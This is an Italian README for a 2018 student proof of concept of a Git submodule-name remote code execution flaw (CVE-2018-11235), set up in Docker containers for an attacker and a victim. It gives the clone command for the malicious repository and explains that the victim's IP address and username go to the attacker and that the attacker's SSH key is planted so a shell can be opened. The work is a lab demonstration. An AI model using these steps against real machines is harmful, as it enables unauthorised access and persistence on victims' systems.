
Prova di concetto - Sfruttamento RCE : vulnerabilità dei nomi dei sottomoduli Git - Ensimag Novembre 2018
Per creare i contenitori Docker, usa:
make docker
(I seguenti comandi make devono essere eseguiti in parallelo su terminali diversi dalla propria macchina)
Per avviare il contenitore del server attaccante, usa:
make run_server
per avviare il contenitore che rappresenta la vittima, usa:
make run_client
Il contenitore eseguirà lo script client.py. Lo script trasmetterà il suo indirizzo IP e il nome utente all'attaccante.
Segui le istruzioni della console dei client per clonare il repository git malevolo.
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned
Noterai che l'indirizzo IP e il nome utente della vittima vengono trasmessi al server.
Dopo il clone, verifica che la chiave pubblica degli attaccanti sia stata aggiunta agli authorized_keys del client.
Successivamente, puoi aprire una shell sul client dal server, grazie al comando seguente (da eseguire sulla tua macchina):
make server_bash
ssh <transmitted_username>@<transmitted_host>
Se dovessi avere qualsiasi problema per eseguire questo Proof of Concept, per favore crea un issue su questo repository: https://github.com/ygouzerh/CVE-2018-11235/issues , ti risponderemo il più rapidamente possibile.